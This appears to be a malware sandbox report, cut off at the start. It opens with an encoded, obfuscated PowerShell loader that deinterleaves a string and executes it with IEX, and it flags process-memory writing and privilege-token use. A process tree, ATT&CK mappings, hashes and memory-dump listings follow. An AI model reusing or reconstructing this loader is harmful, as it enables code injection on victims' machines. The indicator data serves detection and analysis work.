GkAbgBjAGwAZwBPAGMAKABCAHIAJABHAHUAaQBGAG8ALABDAG8AIABjAHkAMgBGAG8AKQBaAGEALABMAG8AIABWAGEAMQBPAHAANgBSAGkAKQAKAFMAdAB9AAoAUAByAGYAUAByAG8AYQB2AHIASQBiACgAVQBuACQASQBuAFUAUwB2AGIARQB4AGEATwB2AGwARgBsAGEARgBsAG4AUgBlAGMAVQBiAGUAVQBnAD0ATgBvADAAbABhADsAVQBoACAAbQBhACQAQwBpAFUATgBvAGIATwBsAGEAVQBkAGwAUAByAGEAQgBvAG4AdQBuAGMAYgBhAGUAUABsACAAcwB0AC0AQQBuAGwARgBvAHQARgBsACAATwBtACQAQwBoAEwARQBjAGEARwBhAHMAVABvAHMAQgBlAG8AQgBvAC4AVQBrAGMATgBvAG8AQQB1AHUASABlAG4AVgBhAHQAUABhACAASwByADsAVABhACAAbgBvACQAUABhAFUAUABsAGIAQwByAGEATgBhAGwAVQBuAGEARgBjAG4AQgBlAGMARgBvAGUAUwBpACsASwBvACsARgByACkACgBTAHkAewAKAE8AdgAJAFAAYQBbAEYAbwBUAHAAaAByAEwAaQBhAEYAcgBjAEQAcgBlAFMAawBhAGQAYQBiAFUAbgBpAE0AYQAxAFMAdABdAFcAZQA6AEYAbwA6AEYAdQBSAFUAbgB0AE4AbwBsAFAAZQBNAFUAbABvAEgAaQB2AHQAYQBlAFAAbwBNAEgAaQBlAEcAbwBtAFIAZQBvAFMAZQByAEYAZQB5AEMAbwAoAFAAZQAkAEUAbABUAFUAZAByAHAAZQBhAFAAcgBjAG8AdgBlAEYAaQBhAFMAdQBiAFMAZQBpAEIAYQAzAFAAcgArAEYAbAAkAEQAZQBVAEYAZQBiAEQAZQBhAEEAdgBsAFIAZQBhAE0AZQBuAE4AbwBjAFMAcABlAFQAYQAsAEEAZABbAEkAbgByAFMAbwBlAGEAbABmAEYAcgBdAGIAZQAkAEEAYQBMAFAAcgBhAFMAbQBzAFIAaQBzAEQAaQBvAEkAbgBbAFUAZAAkAEMAYQBVAFAAbwBiAEcAZQBhAEYAbwBsAFQAcgBhAEYAbwBuAFQAcABjAEYAYQBlAHAAaABdAEsAbAAsAGYAbwAxAFAAcgApAAoATQBvAH0ACgBEAHIAWwBTAGsAVABHAGwAcgBjAGEAYQBCAG8AYwBJAHIAZQBIAGUAYQBBAG0AYgBEAGkAaQBDAG8AMQBVAG4AXQBjAGkAOgBiAHQAOgBBAGQAVgBGAG8AaQBXAGgAdABTAHUAcgBMAGUAdQBWAGUAcwBPAHIAYQBMAG8AMwBHAGUAMgBPAHUAKABFAG4AJABTAHQAVABZAG4AcgBNAGUAYQBEAGkAYwBBAHUAZQBMAGEAYQBvAGYAYgBUAGEAaQBCAGkAMwBHAHIALABTAHAAIABDAGEAMABLAGcAKQBHAGUAIwAKACcAQAANAAoADQAKAA0ACgANAAoADQAKAEYAbwByACgAJABpAD0AMgA7ACAAJABpACAALQBsAHQAIAAkAGEAbgBuAHUAYQBsAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgAMgArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQAVgBpAGIAZQAgAD0AIAAkAFYAaQBiAGUAIAArACAAJABhAG4AbgB1AGEAbAAuAFMAdQBiAHMAdAByAGkAbgBnACgAJABpACwAIAAxACkADQAKAAkADQAKAAkAaQBmACAAKAAkAGEAbgBuAHUAYQBsAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAFYAaQBiAGUAIAA9ACAAJABWAGkAYgBlACAAKwAgACIAYABuACIADQAKAAkACQAkAGkAIAA9ACAAJABpACAAKwAgADEADQAKAAkAfQAgAAkADQAKAAkACQANAAoACQANAAoAfQANAAoADQAKAA0ACgBJAEUAWAAgACQAVgBpAGIAZQANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4316
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\uxmqojlm\uxmqojlm.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:3036
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESCF0D.tmp" "c:\Users\Admin\AppData\Local\Temp\uxmqojlm\CSC8CB9DF2CC27A4936B167DD653CCB6323.TMP"
      4⤵
      PID:3656

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESCF0D.tmp

Filesize
1KB

MD5
1a932b8b42de508c87a6b67ed25066b2

SHA1
b1998c1df969a73ba6ec31edf1e682e254fe68be

SHA256
c1378991d02a599235d367e74396babf993ed9737dbf35a787154eec7c8d90ad

SHA512
fc8f8b1323c504cc53900654e9fb0106bf1445838008f061bba9ca35e2a9d079b53d4ccae72250f035b4ec8f8e62d7fed854908ae04b853f69a8c36e73f8d3dc

Download Submit
C:\Users\Admin\AppData\Local\Temp\uxmqojlm\uxmqojlm.dll

Filesize
4KB

MD5
db8947a9d745d34c2dba9665af79f30d

SHA1
82b13dbacb4f00b2a30c9f49c73fd91b9d00514c

SHA256
6bf0c0b8f612194d39e8349f5aa2b95895a870a3e6db63c2a9657124e3d77f20

SHA512
9c725f7c85fdfccc5ec5fceca4fdad7f5ff26381981401265b798e4f9797e75141586459593916cc7f8a97b4279d62bdc3e0797a8602f8a45a4d63668b258536

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxmqojlm\CSC8CB9DF2CC27A4936B167DD653CCB6323.TMP

Filesize
652B

MD5
72238ba81ba00ed647d0dc49d7c4e68f

SHA1
8462773fef38a067697ed7e90ade3a17a92be63a

SHA256
59f19fc5a8ef88c86c58d53c1fac089a496906be0ff56c59004356bf809da073

SHA512
aa41a4ef1b0f5dcbfac54aa4dc57c843f0978cb0b54fbb507508f67746f1cee067b6a0fda9945d23571e1610f786001f5af647edc2ee2aca570c680c8a0a42e8

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxmqojlm\uxmqojlm.0.cs

Filesize
1KB

MD5
97c4a9992fea6b55435e0ce29c43eb26

SHA1
3e01642f71ea5af46df507a266acb4f16df60b58

SHA256
de1c49877fcea70d2fad0148a83050bdc066d3f32c10318b16d51864230e6769

SHA512
642c0d2c5dc3a3c88d6906b9695bb81f437be9e326be5943cdab64309675a46f942035e8d89284211943e41c480aab2271fffba5babd8951a73fc59ae9c22e3a

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\uxmqojlm\uxmqojlm.cmdline

Filesize
369B

MD5
0f570c8d51838ddcaf2bad7e451286af

SHA1
e8b04c50459f542a28af9a1b0f1954dc42ea8558

SHA256
6797b194282589335449485fb69d707b291bf43ab6e79bcf2f9d31bb3a7e9159

SHA512
412e9b0234683e04d89489d7020fb86688132c05b5baa1e1519bd29dd4434485aa7ede476700117ee8f931d43ac551816f8630ac22ae2427281227fea7aab1a5

Download Submit
memory/3036-142-0x0000000000000000-mapping.dmp

Download
memory/3656-145-0x0000000000000000-mapping.dmp

Download
memory/4316-135-0x00000000053A0000-0x00000000053C2000-memory.dmp

Filesize
136KB

Download
memory/4316-134-0x00000000054B0000-0x0000000005AD8000-memory.dmp

Filesize
6.2MB

Download
memory/4316-141-0x0000000007590000-0x00000000075AA000-memory.dmp

Filesize
104KB

Download
memory/4316-132-0x0000000000000000-mapping.dmp

Download
memory/4316-137-0x0000000005B50000-0x0000000005BB6000-memory.dmp

Filesize
408KB

Download
memory/4316-136-0x0000000005440000-0x00000000054A6000-memory.dmp

Filesize
408KB

Download
memory/4316-140-0x0000000007BD0000-0x000000000824A000-memory.dmp

Filesize
6.5MB

Download
memory/4316-138-0x0000000006270000-0x000000000628E000-memory.dmp

Filesize
120KB

Download
memory/4316-139-0x00000000073F0000-0x0000000007434000-memory.dmp

Filesize
272KB

Download
memory/4316-133-0x0000000002DD0000-0x0000000002E06000-memory.dmp

Filesize
216KB

Download
memory/4316-149-0x0000000007780000-0x0000000007816000-memory.dmp

Filesize
600KB

Download
memory/4316-150-0x0000000007730000-0x0000000007752000-memory.dmp

Filesize
136KB

Download
memory/4316-151-0x0000000008800000-0x0000000008DA4000-memory.dmp

Filesize
5.6MB

Download
memory/4316-152-0x0000000007550000-0x0000000007BCA000-memory.dmp

Filesize
6.5MB

Download
memory/4316-153-0x0000000007550000-0x0000000007BCA000-memory.dmp

Filesize
6.5MB

Download

Analysis

Sharing